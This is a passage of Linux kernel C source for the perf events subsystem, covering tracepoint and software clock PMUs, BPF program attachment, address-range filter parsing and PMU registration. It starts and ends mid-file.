.del = perf_swevent_del,
.start = perf_swevent_start,
.stop = perf_swevent_stop,
.read = perf_swevent_read,
};
#ifdef CONFIG_EVENT_TRACING
static int perf_tp_filter_match(struct perf_event *event,
struct perf_sample_data *data)
{
void *record = data->raw->frag.data;
/* only top level events have filters set */
if (event->parent)
event = event->parent;
if (likely(!event->filter) || filter_match_preds(event->filter, record))
return 1;
return 0;
}
static int perf_tp_event_match(struct perf_event *event,
struct perf_sample_data *data,
struct pt_regs *regs)
{
if (event->hw.state & PERF_HES_STOPPED)
return 0;
/*
* All tracepoints are from kernel-space.
*/
if (event->attr.exclude_kernel)
return 0;
if (!perf_tp_filter_match(event, data))
return 0;
return 1;
}
void perf_trace_run_bpf_submit(void *raw_data, int size, int rctx,
struct trace_event_call *call, u64 count,
struct pt_regs *regs, struct hlist_head *head,
struct task_struct *task)
{
struct bpf_prog *prog = call->prog;
if (prog) {
*(struct pt_regs **)raw_data = regs;
if (!trace_call_bpf(prog, raw_data) || hlist_empty(head)) {
perf_swevent_put_recursion_context(rctx);
return;
}
}
perf_tp_event(call->event.type, count, raw_data, size, regs, head,
rctx, task);
}
EXPORT_SYMBOL_GPL(perf_trace_run_bpf_submit);
void perf_tp_event(u16 event_type, u64 count, void *record, int entry_size,
struct pt_regs *regs, struct hlist_head *head, int rctx,
struct task_struct *task)
{
struct perf_sample_data data;
struct perf_event *event;
struct perf_raw_record raw = {
.frag = {
.size = entry_size,
.data = record,
},
};
perf_sample_data_init(&data, 0, 0);
data.raw = &raw;
perf_trace_buf_update(record, event_type);
hlist_for_each_entry_rcu(event, head, hlist_entry) {
if (perf_tp_event_match(event, &data, regs))
perf_swevent_event(event, count, &data, regs);
}
/*
* If a target task was specified, also iterate its context and
* deliver this event there too.
*/
if (task && task != current) {
struct perf_event_context *ctx;
struct trace_entry *entry = record;
rcu_read_lock();
ctx = rcu_dereference(task->perf_event_ctxp[perf_sw_context]);
if (!ctx)
goto unlock;
list_for_each_entry_rcu(event, &ctx->event_list, event_entry) {
if (event->attr.type != PERF_TYPE_TRACEPOINT)
continue;
if (event->attr.config != entry->type)
continue;
if (perf_tp_event_match(event, &data, regs))
perf_swevent_event(event, count, &data, regs);
}
unlock:
rcu_read_unlock();
}
perf_swevent_put_recursion_context(rctx);
}
EXPORT_SYMBOL_GPL(perf_tp_event);
static void tp_perf_event_destroy(struct perf_event *event)
{
perf_trace_destroy(event);
}
static int perf_tp_event_init(struct perf_event *event)
{
int err;
if (event->attr.type != PERF_TYPE_TRACEPOINT)
return -ENOENT;
/*
* no branch sampling for tracepoint events
*/
if (has_branch_stack(event))
return -EOPNOTSUPP;
err = perf_trace_init(event);
if (err)
return err;
event->destroy = tp_perf_event_destroy;
return 0;
}
static struct pmu perf_tracepoint = {
.task_ctx_nr = perf_sw_context,
.event_init = perf_tp_event_init,
.add = perf_trace_add,
.del = perf_trace_del,
.start = perf_swevent_start,
.stop = perf_swevent_stop,
.read = perf_swevent_read,
};
static inline void perf_tp_register(void)
{
perf_pmu_register(&perf_tracepoint, "tracepoint", PERF_TYPE_TRACEPOINT);
}
static void perf_event_free_filter(struct perf_event *event)
{
ftrace_profile_free_filter(event);
}
#ifdef CONFIG_BPF_SYSCALL
static void bpf_overflow_handler(struct perf_event *event,
struct perf_sample_data *data,
struct pt_regs *regs)
{
struct bpf_perf_event_data_kern ctx = {
.data = data,
.regs = regs,
};
int ret = 0;
preempt_disable();
if (unlikely(__this_cpu_inc_return(bpf_prog_active) != 1))
goto out;
rcu_read_lock();
ret = BPF_PROG_RUN(event->prog, &ctx);
rcu_read_unlock();
out:
__this_cpu_dec(bpf_prog_active);
preempt_enable();
if (!ret)
return;
event->orig_overflow_handler(event, data, regs);
}
static int perf_event_set_bpf_handler(struct perf_event *event, u32 prog_fd)
{
struct bpf_prog *prog;
if (event->overflow_handler_context)
/* hw breakpoint or kernel counter */
return -EINVAL;
if (event->prog)
return -EEXIST;
prog = bpf_prog_get_type(prog_fd, BPF_PROG_TYPE_PERF_EVENT);
if (IS_ERR(prog))
return PTR_ERR(prog);
event->prog = prog;
event->orig_overflow_handler = READ_ONCE(event->overflow_handler);
WRITE_ONCE(event->overflow_handler, bpf_overflow_handler);
return 0;
}
static void perf_event_free_bpf_handler(struct perf_event *event)
{
struct bpf_prog *prog = event->prog;
if (!prog)
return;
WRITE_ONCE(event->overflow_handler, event->orig_overflow_handler);
event->prog = NULL;
bpf_prog_put(prog);
}
#else
static int perf_event_set_bpf_handler(struct perf_event *event, u32 prog_fd)
{
return -EOPNOTSUPP;
}
static void perf_event_free_bpf_handler(struct perf_event *event)
{
}
#endif
static int perf_event_set_bpf_prog(struct perf_event *event, u32 prog_fd)
{
bool is_kprobe, is_tracepoint;
struct bpf_prog *prog;
if (event->attr.type == PERF_TYPE_HARDWARE ||
event->attr.type == PERF_TYPE_SOFTWARE)
return perf_event_set_bpf_handler(event, prog_fd);
if (event->attr.type != PERF_TYPE_TRACEPOINT)
return -EINVAL;
if (event->tp_event->prog)
return -EEXIST;
is_kprobe = event->tp_event->flags & TRACE_EVENT_FL_UKPROBE;
is_tracepoint = event->tp_event->flags & TRACE_EVENT_FL_TRACEPOINT;
if (!is_kprobe && !is_tracepoint)
/* bpf programs can only be attached to u/kprobe or tracepoint */
return -EINVAL;
prog = bpf_prog_get(prog_fd);
if (IS_ERR(prog))
return PTR_ERR(prog);
if ((is_kprobe && prog->type != BPF_PROG_TYPE_KPROBE) ||
(is_tracepoint && prog->type != BPF_PROG_TYPE_TRACEPOINT)) {
/* valid fd, but invalid bpf program type */
bpf_prog_put(prog);
return -EINVAL;
}
if (is_tracepoint) {
int off = trace_event_get_offsets(event->tp_event);
if (prog->aux->max_ctx_offset > off) {
bpf_prog_put(prog);
return -EACCES;
}
}
event->tp_event->prog = prog;
return 0;
}
static void perf_event_free_bpf_prog(struct perf_event *event)
{
struct bpf_prog *prog;
perf_event_free_bpf_handler(event);
if (!event->tp_event)
return;
prog = event->tp_event->prog;
if (prog) {
event->tp_event->prog = NULL;
bpf_prog_put(prog);
}
}
#else
static inline void perf_tp_register(void)
{
}
static void perf_event_free_filter(struct perf_event *event)
{
}
static int perf_event_set_bpf_prog(struct perf_event *event, u32 prog_fd)
{
return -ENOENT;
}
static void perf_event_free_bpf_prog(struct perf_event *event)
{
}
#endif /* CONFIG_EVENT_TRACING */
#ifdef CONFIG_HAVE_HW_BREAKPOINT
void perf_bp_event(struct perf_event *bp, void *data)
{
struct perf_sample_data sample;
struct pt_regs *regs = data;
perf_sample_data_init(&sample, bp->attr.bp_addr, 0);
if (!bp->hw.state && !perf_exclude_event(bp, regs))
perf_swevent_event(bp, 1, &sample, regs);
}
#endif
/*
* Allocate a new address filter
*/
static struct perf_addr_filter *
perf_addr_filter_new(struct perf_event *event, struct list_head *filters)
{
int node = cpu_to_node(event->cpu == -1 ? 0 : event->cpu);
struct perf_addr_filter *filter;
filter = kzalloc_node(sizeof(*filter), GFP_KERNEL, node);
if (!filter)
return NULL;
INIT_LIST_HEAD(&filter->entry);
list_add_tail(&filter->entry, filters);
return filter;
}
static void free_filters_list(struct list_head *filters)
{
struct perf_addr_filter *filter, *iter;
list_for_each_entry_safe(filter, iter, filters, entry) {
if (filter->inode)
iput(filter->inode);
list_del(&filter->entry);
kfree(filter);
}
}
/*
* Free existing address filters and optionally install new ones
*/
static void perf_addr_filters_splice(struct perf_event *event,
struct list_head *head)
{
unsigned long flags;
LIST_HEAD(list);
if (!has_addr_filter(event))
return;
/* don't bother with children, they don't have their own filters */
if (event->parent)
return;
raw_spin_lock_irqsave(&event->addr_filters.lock, flags);
list_splice_init(&event->addr_filters.list, &list);
if (head)
list_splice(head, &event->addr_filters.list);
raw_spin_unlock_irqrestore(&event->addr_filters.lock, flags);
free_filters_list(&list);
}
/*
* Scan through mm's vmas and see if one of them matches the
* @filter; if so, adjust filter's address range.
* Called with mm::mmap_sem down for reading.
*/
static unsigned long perf_addr_filter_apply(struct perf_addr_filter *filter,
struct mm_struct *mm)
{
struct vm_area_struct *vma;
for (vma = mm->mmap; vma; vma = vma->vm_next) {
struct file *file = vma->vm_file;
unsigned long off = vma->vm_pgoff << PAGE_SHIFT;
unsigned long vma_size = vma->vm_end - vma->vm_start;
if (!file)
continue;
if (!perf_addr_filter_match(filter, file, off, vma_size))
continue;
return vma->vm_start;
}
return 0;
}
/*
* Update event's address range filters based on the
* task's existing mappings, if any.
*/
static void perf_event_addr_filters_apply(struct perf_event *event)
{
struct perf_addr_filters_head *ifh = perf_event_addr_filters(event);
struct task_struct *task = READ_ONCE(event->ctx->task);
struct perf_addr_filter *filter;
struct mm_struct *mm = NULL;
unsigned int count = 0;
unsigned long flags;
/*
* We may observe TASK_TOMBSTONE, which means that the event tear-down
* will stop on the parent's child_mutex that our caller is also holding
*/
if (task == TASK_TOMBSTONE)
return;
if (!ifh->nr_file_filters)
return;
mm = get_task_mm(event->ctx->task);
if (!mm)
goto restart;
down_read(&mm->mmap_sem);
raw_spin_lock_irqsave(&ifh->lock, flags);
list_for_each_entry(filter, &ifh->list, entry) {
event->addr_filters_offs[count] = 0;
/*
* Adjust base offset if the filter is associated to a binary
* that needs to be mapped:
*/
if (filter->inode)
event->addr_filters_offs[count] =
perf_addr_filter_apply(filter, mm);
count++;
}
event->addr_filters_gen++;
raw_spin_unlock_irqrestore(&ifh->lock, flags);
up_read(&mm->mmap_sem);
mmput(mm);
restart:
perf_event_stop(event, 1);
}
/*
* Address range filtering: limiting the data to certain
* instruction address ranges. Filters are ioctl()ed to us from
* userspace as ASCII strings.
*
* Filter string format:
*
* ACTION RANGE_SPEC
* where ACTION is one of the following:
* * "filter": limit the trace to this region
* * "start": start tracing from this address
* * "stop": stop tracing at this address/region;
* RANGE_SPEC is
* * for kernel addresses: <start address>[/<size>]
* * for object files: <start address>[/<size>]@</path/to/object/file>
*
* if <size> is not specified, the range is treated as a single address.
*/
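/*
 * Illustrative examples of the format above (the addresses and the path
 * are made up, not taken from any real setup):
 *
 *   filter 0x1000/0x2000@/usr/lib/libfoo.so - trace a 0x2000-byte region
 *                                             starting at offset 0x1000 in
 *                                             the object file
 *   start 0xffffffff81000000/0x100000       - start tracing in this kernel
 *                                             address range
 *   stop 0xffffffff81000000                 - stop tracing at this single
 *                                             kernel address
 */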
enum {
IF_ACT_NONE = -1,
IF_ACT_FILTER,
IF_ACT_START,
IF_ACT_STOP,
IF_SRC_FILE,
IF_SRC_KERNEL,
IF_SRC_FILEADDR,
IF_SRC_KERNELADDR,
};
enum {
IF_STATE_ACTION = 0,
IF_STATE_SOURCE,
IF_STATE_END,
};
static const match_table_t if_tokens = {
{ IF_ACT_FILTER, "filter" },
{ IF_ACT_START, "start" },
{ IF_ACT_STOP, "stop" },
{ IF_SRC_FILE, "%u/%u@%s" },
{ IF_SRC_KERNEL, "%u/%u" },
{ IF_SRC_FILEADDR, "%u@%s" },
{ IF_SRC_KERNELADDR, "%u" },
{ IF_ACT_NONE, NULL },
};
/*
* Address filter string parser
*/
static int
perf_event_parse_addr_filter(struct perf_event *event, char *fstr,
struct list_head *filters)
{
struct perf_addr_filter *filter = NULL;
char *start, *orig, *filename = NULL;
struct path path;
substring_t args[MAX_OPT_ARGS];
int state = IF_STATE_ACTION, token;
unsigned int kernel = 0;
int ret = -EINVAL;
orig = fstr = kstrdup(fstr, GFP_KERNEL);
if (!fstr)
return -ENOMEM;
while ((start = strsep(&fstr, " ,\n")) != NULL) {
ret = -EINVAL;
if (!*start)
continue;
/* filter definition begins */
if (state == IF_STATE_ACTION) {
filter = perf_addr_filter_new(event, filters);
if (!filter)
goto fail;
}
token = match_token(start, if_tokens, args);
switch (token) {
case IF_ACT_FILTER:
case IF_ACT_START:
filter->filter = 1;
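/* fall through: all three actions share the state transition below */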
case IF_ACT_STOP:
if (state != IF_STATE_ACTION)
goto fail;
state = IF_STATE_SOURCE;
break;
case IF_SRC_KERNELADDR:
case IF_SRC_KERNEL:
kernel = 1;
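/* fall through: kernel and file sources share the address parsing */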
case IF_SRC_FILEADDR:
case IF_SRC_FILE:
if (state != IF_STATE_SOURCE)
goto fail;
if (token == IF_SRC_FILE || token == IF_SRC_KERNEL)
filter->range = 1;
*args[0].to = 0;
ret = kstrtoul(args[0].from, 0, &filter->offset);
if (ret)
goto fail;
if (filter->range) {
*args[1].to = 0;
ret = kstrtoul(args[1].from, 0, &filter->size);
if (ret)
goto fail;
}
if (token == IF_SRC_FILE || token == IF_SRC_FILEADDR) {
int fpos = filter->range ? 2 : 1;
filename = match_strdup(&args[fpos]);
if (!filename) {
ret = -ENOMEM;
goto fail;
}
}
state = IF_STATE_END;
break;
default:
goto fail;
}
/*
* Filter definition is fully parsed, validate and install it.
* Make sure that it doesn't contradict itself or the event's
* attribute.
*/
if (state == IF_STATE_END) {
ret = -EINVAL;
if (kernel && event->attr.exclude_kernel)
goto fail;
if (!kernel) {
if (!filename)
goto fail;
/*
* For now, we only support file-based filters
* in per-task events; doing so for CPU-wide
* events requires additional context switching
* trickery, since same object code will be
* mapped at different virtual addresses in
* different processes.
*/
ret = -EOPNOTSUPP;
if (!event->ctx->task)
goto fail_free_name;
/* look up the path and grab its inode */
ret = kern_path(filename, LOOKUP_FOLLOW, &path);
if (ret)
goto fail_free_name;
filter->inode = igrab(d_inode(path.dentry));
path_put(&path);
kfree(filename);
filename = NULL;
ret = -EINVAL;
if (!filter->inode ||
!S_ISREG(filter->inode->i_mode))
/* free_filters_list() will iput() */
goto fail;
event->addr_filters.nr_file_filters++;
}
/* ready to consume more filters */
state = IF_STATE_ACTION;
filter = NULL;
}
}
if (state != IF_STATE_ACTION)
goto fail;
kfree(orig);
return 0;
fail_free_name:
kfree(filename);
fail:
free_filters_list(filters);
kfree(orig);
return ret;
}
static int
perf_event_set_addr_filter(struct perf_event *event, char *filter_str)
{
LIST_HEAD(filters);
int ret;
/*
* Since this is called in the perf_ioctl() path, we're already holding
* ctx::mutex.
*/
lockdep_assert_held(&event->ctx->mutex);
if (WARN_ON_ONCE(event->parent))
return -EINVAL;
ret = perf_event_parse_addr_filter(event, filter_str, &filters);
if (ret)
goto fail_clear_files;
ret = event->pmu->addr_filters_validate(&filters);
if (ret)
goto fail_free_filters;
/* remove existing filters, if any */
perf_addr_filters_splice(event, &filters);
/* install new filters */
perf_event_for_each_child(event, perf_event_addr_filters_apply);
return ret;
fail_free_filters:
free_filters_list(&filters);
fail_clear_files:
event->addr_filters.nr_file_filters = 0;
return ret;
}
static int perf_event_set_filter(struct perf_event *event, void __user *arg)
{
char *filter_str;
int ret = -EINVAL;
if ((event->attr.type != PERF_TYPE_TRACEPOINT ||
!IS_ENABLED(CONFIG_EVENT_TRACING)) &&
!has_addr_filter(event))
return -EINVAL;
filter_str = strndup_user(arg, PAGE_SIZE);
if (IS_ERR(filter_str))
return PTR_ERR(filter_str);
if (IS_ENABLED(CONFIG_EVENT_TRACING) &&
event->attr.type == PERF_TYPE_TRACEPOINT)
ret = ftrace_profile_set_filter(event, event->attr.config,
filter_str);
else if (has_addr_filter(event))
ret = perf_event_set_addr_filter(event, filter_str);
kfree(filter_str);
return ret;
}
/*
* hrtimer based swevent callback
*/
static enum hrtimer_restart perf_swevent_hrtimer(struct hrtimer *hrtimer)
{
enum hrtimer_restart ret = HRTIMER_RESTART;
struct perf_sample_data data;
struct pt_regs *regs;
struct perf_event *event;
u64 period;
event = container_of(hrtimer, struct perf_event, hw.hrtimer);
if (event->state != PERF_EVENT_STATE_ACTIVE)
return HRTIMER_NORESTART;
event->pmu->read(event);
perf_sample_data_init(&data, 0, event->hw.last_period);
regs = get_irq_regs();
if (regs && !perf_exclude_event(event, regs)) {
if (!(event->attr.exclude_idle && is_idle_task(current)))
if (__perf_event_overflow(event, 1, &data, regs))
ret = HRTIMER_NORESTART;
}
period = max_t(u64, 10000, event->hw.sample_period);
hrtimer_forward_now(hrtimer, ns_to_ktime(period));
return ret;
}
static void perf_swevent_start_hrtimer(struct perf_event *event)
{
struct hw_perf_event *hwc = &event->hw;
s64 period;
if (!is_sampling_event(event))
return;
period = local64_read(&hwc->period_left);
if (period) {
if (period < 0)
period = 10000;
local64_set(&hwc->period_left, 0);
} else {
period = max_t(u64, 10000, hwc->sample_period);
}
hrtimer_start(&hwc->hrtimer, ns_to_ktime(period),
HRTIMER_MODE_REL_PINNED);
}
static void perf_swevent_cancel_hrtimer(struct perf_event *event)
{
struct hw_perf_event *hwc = &event->hw;
if (is_sampling_event(event)) {
ktime_t remaining = hrtimer_get_remaining(&hwc->hrtimer);
local64_set(&hwc->period_left, ktime_to_ns(remaining));
hrtimer_cancel(&hwc->hrtimer);
}
}
static void perf_swevent_init_hrtimer(struct perf_event *event)
{
struct hw_perf_event *hwc = &event->hw;
if (!is_sampling_event(event))
return;
hrtimer_init(&hwc->hrtimer, CLOCK_MONOTONIC, HRTIMER_MODE_REL);
hwc->hrtimer.function = perf_swevent_hrtimer;
/*
* Since hrtimers have a fixed rate, we can do a static freq->period
* mapping and avoid the whole period adjust feedback stuff.
*/
if (event->attr.freq) {
long freq = event->attr.sample_freq;
event->attr.sample_period = NSEC_PER_SEC / freq;
hwc->sample_period = event->attr.sample_period;
local64_set(&hwc->period_left, hwc->sample_period);
hwc->last_period = hwc->sample_period;
event->attr.freq = 0;
}
}
/*
* Software event: cpu wall time clock
*/
static void cpu_clock_event_update(struct perf_event *event)
{
s64 prev;
u64 now;
now = local_clock();
prev = local64_xchg(&event->hw.prev_count, now);
local64_add(now - prev, &event->count);
}
static void cpu_clock_event_start(struct perf_event *event, int flags)
{
local64_set(&event->hw.prev_count, local_clock());
perf_swevent_start_hrtimer(event);
}
static void cpu_clock_event_stop(struct perf_event *event, int flags)
{
perf_swevent_cancel_hrtimer(event);
cpu_clock_event_update(event);
}
static int cpu_clock_event_add(struct perf_event *event, int flags)
{
if (flags & PERF_EF_START)
cpu_clock_event_start(event, flags);
perf_event_update_userpage(event);
return 0;
}
static void cpu_clock_event_del(struct perf_event *event, int flags)
{
cpu_clock_event_stop(event, flags);
}
static void cpu_clock_event_read(struct perf_event *event)
{
cpu_clock_event_update(event);
}
static int cpu_clock_event_init(struct perf_event *event)
{
if (event->attr.type != PERF_TYPE_SOFTWARE)
return -ENOENT;
if (event->attr.config != PERF_COUNT_SW_CPU_CLOCK)
return -ENOENT;
/*
* no branch sampling for software events
*/
if (has_branch_stack(event))
return -EOPNOTSUPP;
perf_swevent_init_hrtimer(event);
return 0;
}
static struct pmu perf_cpu_clock = {
.task_ctx_nr = perf_sw_context,
.capabilities = PERF_PMU_CAP_NO_NMI,
.event_init = cpu_clock_event_init,
.add = cpu_clock_event_add,
.del = cpu_clock_event_del,
.start = cpu_clock_event_start,
.stop = cpu_clock_event_stop,
.read = cpu_clock_event_read,
};
/*
* Software event: task time clock
*/
static void task_clock_event_update(struct perf_event *event, u64 now)
{
u64 prev;
s64 delta;
prev = local64_xchg(&event->hw.prev_count, now);
delta = now - prev;
local64_add(delta, &event->count);
}
static void task_clock_event_start(struct perf_event *event, int flags)
{
local64_set(&event->hw.prev_count, event->ctx->time);
perf_swevent_start_hrtimer(event);
}
static void task_clock_event_stop(struct perf_event *event, int flags)
{
perf_swevent_cancel_hrtimer(event);
task_clock_event_update(event, event->ctx->time);
}
static int task_clock_event_add(struct perf_event *event, int flags)
{
if (flags & PERF_EF_START)
task_clock_event_start(event, flags);
perf_event_update_userpage(event);
return 0;
}
static void task_clock_event_del(struct perf_event *event, int flags)
{
task_clock_event_stop(event, PERF_EF_UPDATE);
}
static void task_clock_event_read(struct perf_event *event)
{
u64 now = perf_clock();
u64 delta = now - event->ctx->timestamp;
u64 time = event->ctx->time + delta;
task_clock_event_update(event, time);
}
static int task_clock_event_init(struct perf_event *event)
{
if (event->attr.type != PERF_TYPE_SOFTWARE)
return -ENOENT;
if (event->attr.config != PERF_COUNT_SW_TASK_CLOCK)
return -ENOENT;
/*
* no branch sampling for software events
*/
if (has_branch_stack(event))
return -EOPNOTSUPP;
perf_swevent_init_hrtimer(event);
return 0;
}
static struct pmu perf_task_clock = {
.task_ctx_nr = perf_sw_context,
.capabilities = PERF_PMU_CAP_NO_NMI,
.event_init = task_clock_event_init,
.add = task_clock_event_add,
.del = task_clock_event_del,
.start = task_clock_event_start,
.stop = task_clock_event_stop,
.read = task_clock_event_read,
};
static void perf_pmu_nop_void(struct pmu *pmu)
{
}
static void perf_pmu_nop_txn(struct pmu *pmu, unsigned int flags)
{
}
static int perf_pmu_nop_int(struct pmu *pmu)
{
return 0;
}
static DEFINE_PER_CPU(unsigned int, nop_txn_flags);
static void perf_pmu_start_txn(struct pmu *pmu, unsigned int flags)
{
__this_cpu_write(nop_txn_flags, flags);
if (flags & ~PERF_PMU_TXN_ADD)
return;
perf_pmu_disable(pmu);
}
static int perf_pmu_commit_txn(struct pmu *pmu)
{
unsigned int flags = __this_cpu_read(nop_txn_flags);
__this_cpu_write(nop_txn_flags, 0);
if (flags & ~PERF_PMU_TXN_ADD)
return 0;
perf_pmu_enable(pmu);
return 0;
}
static void perf_pmu_cancel_txn(struct pmu *pmu)
{
unsigned int flags = __this_cpu_read(nop_txn_flags);
__this_cpu_write(nop_txn_flags, 0);
if (flags & ~PERF_PMU_TXN_ADD)
return;
perf_pmu_enable(pmu);
}
static int perf_event_idx_default(struct perf_event *event)
{
return 0;
}
/*
* Ensures all contexts with the same task_ctx_nr have the same
* pmu_cpu_context too.
*/
static struct perf_cpu_context __percpu *find_pmu_context(int ctxn)
{
struct pmu *pmu;
if (ctxn < 0)
return NULL;
list_for_each_entry(pmu, &pmus, entry) {
if (pmu->task_ctx_nr == ctxn)
return pmu->pmu_cpu_context;
}
return NULL;
}
static void free_pmu_context(struct pmu *pmu)
{
mutex_lock(&pmus_lock);
free_percpu(pmu->pmu_cpu_context);
mutex_unlock(&pmus_lock);
}
/*
* Let userspace know that this PMU supports address range filtering:
*/
static ssize_t nr_addr_filters_show(struct device *dev,
struct device_attribute *attr,
char *page)
{
struct pmu *pmu = dev_get_drvdata(dev);
return snprintf(page, PAGE_SIZE - 1, "%d\n", pmu->nr_addr_filters);
}
DEVICE_ATTR_RO(nr_addr_filters);
static struct idr pmu_idr;
static ssize_t
type_show(struct device *dev, struct device_attribute *attr, char *page)
{
struct pmu *pmu = dev_get_drvdata(dev);
return snprintf(page, PAGE_SIZE-1, "%d\n", pmu->type);
}
static DEVICE_ATTR_RO(type);
static ssize_t
perf_event_mux_interval_ms_show(struct device *dev,
struct device_attribute *attr,
char *page)
{
struct pmu *pmu = dev_get_drvdata(dev);
return snprintf(page, PAGE_SIZE-1, "%d\n", pmu->hrtimer_interval_ms);
}
static DEFINE_MUTEX(mux_interval_mutex);
static ssize_t
perf_event_mux_interval_ms_store(struct device *dev,
struct device_attribute *attr,
const char *buf, size_t count)
{
struct pmu *pmu = dev_get_drvdata(dev);
int timer, cpu, ret;
ret = kstrtoint(buf, 0, &timer);
if (ret)
return ret;
if (timer < 1)
return -EINVAL;
/* same value, nothing to do */
if (timer == pmu->hrtimer_interval_ms)
return count;
mutex_lock(&mux_interval_mutex);
pmu->hrtimer_interval_ms = timer;
/* update all cpuctx for this PMU */
get_online_cpus();
for_each_online_cpu(cpu) {
struct perf_cpu_context *cpuctx;
cpuctx = per_cpu_ptr(pmu->pmu_cpu_context, cpu);
cpuctx->hrtimer_interval = ns_to_ktime(NSEC_PER_MSEC * timer);
cpu_function_call(cpu,
(remote_function_f)perf_mux_hrtimer_restart, cpuctx);
}
put_online_cpus();
mutex_unlock(&mux_interval_mutex);
return count;
}
static DEVICE_ATTR_RW(perf_event_mux_interval_ms);
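/*
* Rough userspace sketch of driving the attribute above through the
* "event_source" bus registered below; writing "4" requests a 4ms
* multiplexing interval. The "cpu" device name is an assumption for
* illustration, the actual name depends on the PMU that registered it:
*
* int fd = open("/sys/bus/event_source/devices/cpu/perf_event_mux_interval_ms",
* O_WRONLY);
* if (fd >= 0) {
* write(fd, "4", 1);
* close(fd);
* }
*/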
static struct attribute *pmu_dev_attrs[] = {
&dev_attr_type.attr,
&dev_attr_perf_event_mux_interval_ms.attr,
NULL,
};
ATTRIBUTE_GROUPS(pmu_dev);
static int pmu_bus_running;
static struct bus_type pmu_bus = {
.name = "event_source",
.dev_groups = pmu_dev_groups,
};
static void pmu_dev_release(struct device *dev)
{
kfree(dev);
}
static int pmu_dev_alloc(struct pmu *pmu)
{
int ret = -ENOMEM;
pmu->dev = kzalloc(sizeof(struct device), GFP_KERNEL);
if (!pmu->dev)
goto out;
pmu->dev->groups = pmu->attr_groups;
device_initialize(pmu->dev);
ret = dev_set_name(pmu->dev, "%s", pmu->name);
if (ret)
goto free_dev;
dev_set_drvdata(pmu->dev, pmu);
pmu->dev->bus = &pmu_bus;
pmu->dev->release = pmu_dev_release;
ret = device_add(pmu->dev);
if (ret)
goto free_dev;
/* For PMUs with address filters, throw in an extra attribute: */
if (pmu->nr_addr_filters)
ret = device_create_file(pmu->dev, &dev_attr_nr_addr_filters);
if (ret)
goto del_dev;
out:
return ret;
del_dev:
device_del(pmu->dev);
free_dev:
put_device(pmu->dev);
goto out;
}
static struct lock_class_key cpuctx_mutex;
static struct lock_class_key cpuctx_lock;
int perf_pmu_register(struct pmu *pmu, const char *name, int type)
{
int cpu, ret;
mutex_lock(&pmus_lock);
ret = -ENOMEM;
pmu->pmu_disable_count = alloc_percpu(int);
if (!pmu->pmu_disable_count)
goto unlock;
pmu->type = -1;
if (!name)
goto skip_type;
pmu->name = name;
if (type < 0) {
type = idr_alloc(&pmu_idr, pmu, PERF_TYPE_MAX, 0, GFP_KERNEL);
if (type < 0) {
ret = type;
goto free_pdc;
}
}
pmu->type = type;
if (pmu_bus_running) {
ret = pmu_dev_alloc(pmu);
if (ret)
goto free_idr;
}
skip_type:
if (pmu->task_ctx_nr == perf_hw_context) {
static int hw_context_taken = 0;
/*
* Other than systems with heterogeneous CPUs, it never makes
* sense for two PMUs to share perf_hw_context. PMUs which are
* uncore must use perf_invalid_context.
*/
if (WARN_ON_ONCE(hw_context_taken &&
!(pmu->capabilities & PERF_PMU_CAP_HETEROGENEOUS_CPUS)))
pmu->task_ctx_nr = perf_invalid_context;
hw_context_taken = 1;
}
pmu->pmu_cpu_context = find_pmu_context(pmu->task_ctx_nr);
if (pmu->pmu_cpu_context)
goto got_cpu_context;
ret = -ENOMEM;
pmu->pmu_cpu_context = alloc_percpu(struct perf_cpu_context);
if (!pmu->pmu_cpu_context)
goto free_dev;
for_each_possible_cpu(cpu) {
struct perf_cpu_context *cpuctx;
cpuctx = per_cpu_ptr(pmu->pmu_cpu_context, cpu);
__perf_event_init_context(&cpuctx->ctx);
lockdep_set_class(&cpuctx->ctx.mutex, &cpuctx_mutex);
lockdep_set_class(&cpuctx->ctx.lock, &cpuctx_lock);
cpuctx->ctx.pmu = pmu;
__perf_mux_hrtimer_init(cpuctx, cpu);
}
got_cpu_context:
if (!pmu->start_txn) {
if (pmu->pmu_enable) {
/*
* If we have pmu_enable/pmu_disable calls, install
* transaction stubs that use them to try and batch
* hardware accesses.
*/
pmu->start_txn = perf_pmu_start_txn;
pmu->commit_txn = perf_pmu_commit_txn;
pmu->cancel_txn = perf_pmu_cancel_txn;
} else {
pmu->start_txn = perf_pmu_nop_txn;
pmu->commit_txn = perf_pmu_nop_int;
pmu->cancel_txn = perf_pmu_nop_void;
}
}
if (!pmu->pmu_enable) {
pmu->pmu_enable = perf_pmu_nop_void;
pmu->pmu_disable = perf_pmu_nop_void;
}
if (!pmu->event_idx)
pmu->event_idx = perf_event_idx_default;
list_add_rcu(&pmu->entry, &pmus);
atomic_set(&pmu->exclusive_cnt, 0);
ret = 0;
unlock:
mutex_unlock(&pmus_lock);
return ret;
free_dev:
device_del(pmu->dev);
put_device(pmu->dev);
free_idr:
if (pmu->type >= PERF_TYPE_MAX)
idr_remove(&pmu_idr, pmu->type);
free_pdc:
free_percpu(pmu->pmu_disable_count);
goto unlock;
}
EXPORT_SYMBOL_GPL(perf_pmu_register);
void perf_pmu_unregister(struct pmu *pmu)
{
int remove_device;
mutex_lock(&pmus_lock);
remove_device = pmu_bus_running;
list_del_rcu(&pmu->entry);
mutex_unlock(&pmus_lock);
/*
* We dereference the pmu list under both SRCU and regular RCU, so
* synchronize against both of those.
*/
synchronize_srcu(&pmus_srcu);
synchronize_rcu();
free_percpu(pmu->pmu_disable_count);
if (pmu->type >= PERF_TYPE_MAX)
idr_remove(&pmu_idr, pmu->type);
if (remove_device) {
if (pmu->nr_addr_filters)
device_remove_file(pmu->dev, &dev_attr_nr_addr_filters);
device_del(pmu->dev);
put_device(pmu->dev);
}
free_pmu_context(pmu);
}
EXPORT_SYMBOL_GPL(perf_pmu_unregister);
static int perf_try_init_event(struct pmu *pmu, struct perf_event *event)
{
struct perf_event_context *ctx = NULL;
int ret;
if (!try_module_get(pmu->module))
return -ENODEV;
if (event->group_leader != event) {
/*
* This ctx->mutex can nest when we're called through
* inheritance. See the perf_event_ctx_lock_nested() comment.
*/
ctx = perf_event_ctx_lock_nested(event->group_leader,
SINGLE_DEPTH_NESTING);
BUG_ON(!ctx);
}
event->pmu = pmu;
ret = pmu->event_init(event);
if (ctx)
perf_event_ctx_unlock(event->group_leader, ctx);
if (ret)
module_put(pmu->module);
return ret;
}
static struct pmu *perf_init_event(struct perf_event *event)
{
struct pmu *pmu = NULL;
int idx;
int ret;
idx = srcu_read_lock(&pmus_srcu);
/* Try parent's PMU first: */
if (event->parent && event->parent->pmu) {
pmu = event->parent->pmu;
ret = perf_try_init_event(pmu, event);
if (!ret)
goto unlock;
}
rcu_read_lock();
pmu = idr_find(&pmu_idr, event->attr.type);
rcu_read_unlock();
if (pmu) {
ret = perf_try_init_event(pmu, event);
